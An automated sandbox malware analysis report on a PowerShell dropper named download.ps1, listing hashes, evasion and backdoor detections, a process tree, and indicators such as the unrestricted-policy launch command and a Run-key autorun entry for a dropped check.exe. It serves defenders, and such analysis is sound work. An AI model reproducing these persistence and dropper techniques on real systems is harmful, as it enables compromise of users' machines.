Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:	download.ps1
Analysis ID:	1572542
MD5:	a766c6fe1358b7d441ff94575d3d4eb1
SHA1:	15d42c28ec43a8470f1027b0dbebe976c623e09a
SHA256:	ec7dc800753751c1de3d99e575ea591fe54210fddb48f1bfca88679fbc358c17
Tags:	KongTukeps1user-monitorsg
Infos:

Detection

Python BackDoor

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Python BackDoor

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Opens network shares

Powershell drops PE file

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Binary contains a suspicious time stamp

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

PE file does not import any functions

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Classification

Process Tree

System is w10x64

powershell.exe (PID: 4836 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

check.exe (PID: 6640 cmdline: "C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe" MD5: F17797CAAB0F1CB8D5813853AAD786CA)

check.exe (PID: 1008 cmdline: "C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe" MD5: F17797CAAB0F1CB8D5813853AAD786CA)

systeminfo.exe (PID: 3800 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)

conhost.exe (PID: 1020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 764 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 5064 cmdline: wmic computersystem get manufacturer MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WerFault.exe (PID: 1484 cmdline: C:\Windows\system32\WerFault.exe -u -p 1008 -s 940 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

check.exe (PID: 5716 cmdline: "C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe" MD5: F17797CAAB0F1CB8D5813853AAD786CA)

check.exe (PID: 6704 cmdline: "C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe" MD5: F17797CAAB0F1CB8D5813853AAD786CA)

systeminfo.exe (PID: 6884 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)

conhost.exe (PID: 4864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 1512 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 6732 cmdline: wmic computersystem get manufacturer MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WerFault.exe (PID: 424 cmdline: C:\Windows\system32\WerFault.exe -u -p 6704 -s 976 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

check.exe (PID: 6084 cmdline: "C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe" MD5: F17797CAAB0F1CB8D5813853AAD786CA)

check.exe (PID: 6724 cmdline: "C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe" MD5: F17797CAAB0F1CB8D5813853AAD786CA)

systeminfo.exe (PID: 7108 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)

conhost.exe (PID: 7072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 420 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 2084 cmdline: wmic computersystem get manufacturer MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

WerFault.exe (PID: 3700 cmdline: C:\Windows\system32\WerFault.exe -u -p 6724 -s 996 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000005.00000003.2373391380.00000183550AE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PythonBackDoor_1	Yara detected Python BackDoor	Joe Security
00000005.00000003.2372124861.00000183550AE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PythonBackDoor_1	Yara detected Python BackDoor	Joe Security
0000000F.00000002.2669527004.0000026A5D2EB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PythonBackDoor_1	Yara detected Python BackDoor	Joe Security
00000005.00000003.2413685847.00000183550AE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PythonBackDoor_1	Yara detected Python BackDoor	Joe Security
0000000F.00000003.2511360407.0000026A5D2EB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PythonBackDoor_1	Yara detected Python BackDoor	Joe Security
00000005.00000002.2580123752.00000183550AE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PythonBackDoor_1	Yara detected Python BackDoor	Joe Security
00000018.00000002.2733954233.0000025DEA117000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PythonBackDoor_1	Yara detected Python BackDoor	Joe Security
00000005.00000003.2375173777.00000183550AE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PythonBackDoor_1	Yara detected Python BackDoor	Joe Security
00000005.00000003.2373135465.00000183550AE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PythonBackDoor_1	Yara detected Python BackDoor	Joe Security
00000005.00000003.2372540922.00000183550AE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PythonBackDoor_1	Yara detected Python BackDoor	Joe Security
00000005.00000003.2371318257.00000183550AE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PythonBackDoor_1	Yara detected Python BackDoor	Joe Security
00000005.00000003.2409464114.00000183550AE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PythonBackDoor_1	Yara detected Python BackDoor	Joe Security
00000005.00000003.2366082675.00000183550AE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PythonBackDoor_1	Yara detected Python BackDoor	Joe Security
0000000F.00000003.2514741101.0000026A5D2EB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PythonBackDoor_1	Yara detected Python BackDoor	Joe Security
Process Memory Space: check.exe PID: 1008	JoeSecurity_PythonBackDoor_1	Yara detected Python BackDoor	Joe Security
Click to see the 10 entries

Sigma Signatures

System Summary

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 4836, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4836, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetUtilityApp

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4836, TargetFilename: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 4836, ProcessName: powershell.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 89.9% probability

Source:	Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qtiff.pdbBB source: check.exe, 00000004.00000003.2324743925.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\plugins\platformthemes\qxdgdesktopportal.pdb source: check.exe, 00000004.00000003.2327593939.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtsvg\plugins\iconusers\qsvgicon.pdb source: check.exe, 00000004.00000003.2323533147.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtsvg\plugins\imageformats\qsvg.pdb source: check.exe, 00000004.00000003.2324494558.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: check.exe, 00000005.00000002.2658803695.00007FFD93267000.00000002.00000001.01000000.00000020.sdmp
Source:	Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\msvcp140_1.amd64.pdb source: check.exe, 00000004.00000003.2294950852.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb\| source: check.exe, 00000005.00000002.2608629534.00007FFD8A8FA000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\plugins\generic\qtuiotouchplugin.pdb source: check.exe, 00000004.00000003.2323316314.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Core.pdb source: check.exe, 00000005.00000002.2641050511.00007FFD8AE36000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: check.exe, 00000005.00000002.2670730924.00007FFDA3875000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\plugins\imageformats\qico.pdb source: check.exe, 00000004.00000003.2324102716.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qtiff.pdb source: check.exe, 00000004.00000003.2324743925.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\plugins\imageformats\qgif.pdb source: check.exe, 00000004.00000003.2323887657.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"userSDIR: "C:\Program Files\OpenSSL\lib\users-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
Source:	Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qtga.pdb source: check.exe, 00000004.00000003.2324612761.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: check.exe, 00000005.00000002.2674329936.00007FFDA5544000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: check.exe, 00000005.00000002.2608629534.00007FFD8A862000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: check.exe, 00000005.00000002.2674329936.00007FFDA5544000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-3.pdb source: check.exe, 00000005.00000002.2608629534.00007FFD8A8FA000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: check.exe, 00000004.00000003.2307937403.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2676146575.00007FFDA5B95000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qicns.pdb source: check.exe, 00000004.00000003.2323993737.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: check.exe, 00000005.00000002.2675027368.00007FFDA57F3000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\plugins\styles\qwindowsvistastyle.pdb%% source: check.exe, 00000005.00000002.2665925741.00007FFD9DB67000.00000002.00000001.01000000.00000027.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\plugins\styles\qwindowsvistastyle.pdb source: check.exe, 00000005.00000002.2665925741.00007FFD9DB67000.00000002.00000001.01000000.00000027.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: check.exe, 00000005.00000002.2672390476.00007FFDA3903000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: check.exe, 00000005.00000002.2673918432.00007FFDA5526000.00000002.00000001.01000000.0000001C.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\plugins\imageformats\qico.pdb source: check.exe, 00000004.00000003.2324102716.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: check.exe, 00000005.00000002.2671616130.00007FFDA38DB000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\plugins\generic\qtuiotouchplugin.pdb source: check.exe, 00000004.00000003.2323316314.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Core.pdbT source: check.exe, 00000005.00000002.2641050511.00007FFD8AE36000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: check.exe, 00000005.00000002.2673588436.00007FFDA5493000.00000002.00000001.01000000.0000001D.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Gui.pdb source: check.exe, 00000005.00000002.2598607566.00007FFD897AA000.00000002.00000001.01000000.00000024.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: check.exe, 00000005.00000002.2671616130.00007FFDA38DB000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: check.exe, 00000005.00000002.2672683215.00007FFDA3A8D000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Widgets.pdb source: check.exe, 00000005.00000002.2601086899.00007FFD89DAA000.00000002.00000001.01000000.00000023.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: check.exe, 00000005.00000002.2670198233.00007FFDA3809000.00000002.00000001.01000000.00000017.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qwbmp.pdb source: check.exe, 00000004.00000003.2324940975.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python3.pdb source: check.exe, 00000005.00000002.2579851249.0000018354DB0000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: C:\Users\qt\work\qt\qtbase\lib\libEGL.pdb source: check.exe, 00000004.00000003.2309399741.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python313.pdb source: check.exe, 00000005.00000002.2653958490.00007FFD8B608000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: check.exe, 00000004.00000003.2307774514.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: check.exe, 00000005.00000002.2669412087.00007FFDA37DE000.00000002.00000001.01000000.00000019.sdmp

Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Code function: 4_2_00007FF6D9239280 FindFirstFileExW,FindClose,	4_2_00007FF6D9239280
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Code function: 4_2_00007FF6D92383C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	4_2_00007FF6D92383C0
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Code function: 4_2_00007FF6D9251874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	4_2_00007FF6D9251874
Source: C:\Users\user\AppData\Roaming\DzIcXtPK\check.exe	Code function: 5_2_00007FF6D9239280 FindFirstFileExW,FindClose,	5_2_00007FF6D9239280

Source: C:\Windows\System32\WerFault.exe	File opened: C:\Users\user\AppData\Local\Temp\_MEI66402\
Source: C:\Windows\System32\WerFault.exe	File opened: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\
Source: C:\Windows\System32\WerFault.exe	File opened: C:\Users\user\AppData\Local\Temp\_MEI66402\PyQt5\Qt5\
Source: C:\Windows\System32\WerFault.exe	File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\System32\WerFault.exe	File opened: C:\Users\user\
Source: C:\Windows\System32\WerFault.exe	File opened: C:\Users\user\AppData\

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: nodejs.org

Source: check.exe, 00000005.00000002.2585634038.0000018355A70000.00000004.00001000.00020000.00000000.sdmp, check.exe, 00000005.00000003.2415314317.0000018355546000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://.../back.jpeg
Source: check.exe, 00000004.00000003.2680794042.0000019B963B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digi
Source: check.exe, 00000004.00000003.2309399741.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredID
Source: check.exe, 00000004.00000003.2323887657.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324102716.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2303863332.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2305782270.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2323533147.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2309399741.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2327986930.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2295709781.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324743925.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324940975.0000019B963B1000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2326098634.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2304532091.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2323993737.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2323316314.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2325441662.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2309399741.0000019B963B1000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324248237.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2328247501.0000019B963B2000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2301672033.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324494558.0000019B963B1000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2306706230.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: check.exe, 00000004.00000003.2323887657.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324102716.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2303863332.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2305782270.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2323533147.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2309399741.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2327986930.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2295709781.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324743925.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2326098634.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2304532091.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2323993737.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2323316314.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2325441662.0000019B963A5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2309399741.0000019B963B1000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324248237.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2301672033.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2306706230.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2324940975.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2298478851.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2305554575.0000019B963A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
